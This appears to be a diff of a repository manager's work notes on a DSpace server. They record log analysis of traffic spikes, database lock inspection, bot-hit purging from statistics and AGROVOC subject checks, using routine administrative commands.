                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 38 hits from DTS Agent in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 601 hits from Microsoft Office Existence Discovery in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 51 hits from Site24x7 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 62 hits from Trello in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 13574 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 144 hits from FlipboardProxy in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 37 hits from LinkWalker in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 1 hits from [Ll]ink.?[Cc]heck.? in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 427 hits from WordPress in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Total number of bot hits purged: 15030
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Meet with the CGIAR–AGROVOC task group to discuss how we want to do the workflow for submitting new terms to AGROVOC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • I extracted another list of all subjects to check against AGROVOC:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      \COPY (SELECT DISTINCT(LOWER(text_value)) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-06-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvcut -c 1 /tmp/2021-07-06-all-subjects.csv | sed 1d > /tmp/2021-07-06-all-subjects.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-06-agrovoc-results-all-subjects.csv -d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        \COPY (SELECT DISTINCT(LOWER(text_value)) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-06-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ csvcut -c 1 /tmp/2021-07-06-all-subjects.csv | sed 1d > /tmp/2021-07-06-all-subjects.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-06-agrovoc-results-all-subjects.csv -d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Test Hrafn Malmquist’s proposed DBCP2 changes for DSpace 6.4 (DS-4574)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • His changes reminded me that we can perhaps switch back to using this pooling instead of Tomcat 7’s JDBC pooling via JNDI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -205,84 +205,84 @@ $ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        # for num in {10..26}; do echo "2021-06-$num"; zcat /var/log/nginx/access.log.*.gz /var/log/nginx/library-access.log.*.gz | grep "$num/Jun/2021" | awk '{print $1}' | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -10693
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -10587
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -7958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -7681
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -12639
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -15388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -12245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -11187
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -9684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -7835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -7198
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -10380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -10255
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -15878
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -9963
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -9439
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -7930
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          # for num in {10..26}; do echo "2021-06-$num"; zcat /var/log/nginx/access.log.*.gz /var/log/nginx/library-access.log.*.gz | grep "$num/Jun/2021" | awk '{print $1}' | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +10693
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +10587
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +7958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +7681
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +12639
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +15388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +12245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +11187
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +9684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +7835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +7198
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +10380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +10255
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +15878
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +9963
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +9439
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +7930
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Similarly, the number of connections to the REST API was around the average for the recent weeks before:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          # for num in {10..26}; do echo "2021-06-$num"; zcat /var/log/nginx/rest.*.gz | grep "$num/Jun/2021" | awk '{print $1}' | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1183
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1074
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1257
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -965
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1098
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1375
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1135
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -969
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            # for num in {10..26}; do echo "2021-06-$num"; zcat /var/log/nginx/rest.*.gz | grep "$num/Jun/2021" | awk '{print $1}' | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1183
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1074
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1257
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +965
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1098
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1375
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1135
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +969
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
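The loop above decompresses every `rest.*.gz` file once per day, and its `grep` matches the date anywhere in the line (including the request URL or referrer). A minimal single-pass sketch follows, assuming the logs use nginx's combined format, with the client address in field 1 and the timestamp in field 4. The function name `unique_ips_per_day` is hypothetical and not part of the original notes.

```shell
# Hypothetical helper (not from the original notes): count unique client
# IPs per day in a single pass over nginx combined-format log lines on stdin.
unique_ips_per_day() {
    awk '{
        # $4 looks like "[23/Jun/2021:02:00:01"; keep only "23/Jun/2021"
        day = substr($4, 2, 11)
        # count each (day, IP) pair only the first time it is seen
        if (!seen[day, $1]++) count[day]++
    }
    END { for (d in count) print d, count[d] }' | sort
}

# Usage (paths as in the loop above):
#   zcat /var/log/nginx/rest.*.gz | unique_ips_per_day
```

The plain `sort` orders days correctly only within a single month, which is enough for a range such as 10 to 26 June. Unlike the loop, this reports every day found in the input, so any date filtering would have to be added separately.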
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • According to goaccess, the traffic spike started at 2AM (remember that the first “Pool empty” error in dspace.log was at 4:01AM):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            # zcat /var/log/nginx/access.log.1[45].gz /var/log/nginx/library-access.log.1[45].gz | grep -E '23/Jun/2021' | goaccess --log-format=COMBINED -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              # zcat /var/log/nginx/access.log.1[45].gz /var/log/nginx/library-access.log.1[45].gz | grep -E '23/Jun/2021' | goaccess --log-format=COMBINED -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Moayad sent a fix for the add missing items plugins issue (#107)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • It works MUCH faster because it correctly identifies the missing handles in each repository
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • @@ -311,19 +311,19 @@ $ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -2302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -2564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -2530
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +2302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +2564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +2530
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • The locks are held by XMLUI, not REST API or OAI:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     57 dspaceApi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   2671 dspaceWeb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     57 dspaceApi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   2671 dspaceWeb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • I ran all updates on the server (linode18) and restarted it, then DSpace came back up
• I sent a message to Atmire, as I never heard back from them last week, when we blocked access to the REST API for two days so they could investigate the server issues
• I cloned the openrxv-items-temp index on AReS and re-ran all the plugins, but most of the “dspace_add_missing_items” tasks failed so I will just run a full re-harvest
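The per-pool lock tally above (the `grep -o -E ... | sort | uniq -c | sort -n` pipeline) can also be sketched in Python, which is handy if the counts need to be logged or compared over time. This is only a minimal sketch: the pool names `dspaceWeb` and `dspaceApi` come from the output above, while the function names and the idea of passing in saved `psql` output as a string are assumptions made for illustration.

```python
import re
from collections import Counter

# Pool names as they appear in the psql output above.
POOL_PATTERN = re.compile(r"dspaceWeb|dspaceApi")


def count_locks_by_pool(psql_output: str) -> Counter:
    """Count every occurrence of a known pool name in the text.

    Like `grep -o`, this counts each match, not each matching line.
    """
    return Counter(POOL_PATTERN.findall(psql_output))


def format_counts(counts: Counter) -> list[str]:
    """Render the counts in ascending order, similar to `uniq -c | sort -n`."""
    ordered = sorted(counts.items(), key=lambda item: (item[1], item[0]))
    return [f"{n:7d} {pool}" for pool, n in ordered]
```

To use it, save the output of the `psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;'` command to a file, read it into a string, and print the lines returned by `format_counts(count_locks_by_pool(text))`.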
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • @@ -338,31 +338,31 @@ postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_ac
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                # grepcidr 91.243.191.0/24 /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     32 91.243.191.124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     33 91.243.191.129
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     33 91.243.191.200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     34 91.243.191.115
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     34 91.243.191.154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     34 91.243.191.234
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     34 91.243.191.56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     35 91.243.191.187
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     35 91.243.191.91
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     36 91.243.191.58
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     37 91.243.191.209
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     39 91.243.191.119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     39 91.243.191.144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     39 91.243.191.55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     40 91.243.191.112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     40 91.243.191.182
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     40 91.243.191.57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     40 91.243.191.98
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     41 91.243.191.106
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     44 91.243.191.79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     45 91.243.191.151
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     46 91.243.191.103
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     56 91.243.191.172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  # grepcidr 91.243.191.0/24 /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     32 91.243.191.124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     33 91.243.191.129
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     33 91.243.191.200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     34 91.243.191.115
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     34 91.243.191.154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     34 91.243.191.234
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     34 91.243.191.56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     35 91.243.191.187
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     35 91.243.191.91
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     36 91.243.191.58
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     37 91.243.191.209
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     39 91.243.191.119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     39 91.243.191.144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     39 91.243.191.55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     40 91.243.191.112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     40 91.243.191.182
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     40 91.243.191.57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     40 91.243.191.98
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     41 91.243.191.106
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     44 91.243.191.79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     45 91.243.191.151
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     46 91.243.191.103
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     56 91.243.191.172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ ./asn -n 45.80.217.235  
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -╭──────────────────────────────╮
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -│ ASN lookup for 45.80.217.235 │
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -╰──────────────────────────────╯
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  - 45.80.217.235 ┌PTR -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├ASN 46844 (ST-BGP, US)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├ORG Sharktech
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├NET 45.80.217.0/24 (TrafficTransitSolutionNet)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├ABU info@traffictransitsolution.us
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├ROA ✓ VALID (1 ROA found)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├TYP  Proxy host   Hosting/DC 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├GEO Los Angeles, California (US)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               └REP ✓ NONE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ ./asn -n 45.80.217.235  
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +╭──────────────────────────────╮
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +│ ASN lookup for 45.80.217.235 │
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +╰──────────────────────────────╯
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    + 45.80.217.235 ┌PTR -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├ASN 46844 (ST-BGP, US)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├ORG Sharktech
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├NET 45.80.217.0/24 (TrafficTransitSolutionNet)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├ABU info@traffictransitsolution.us
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├ROA ✓ VALID (1 ROA found)
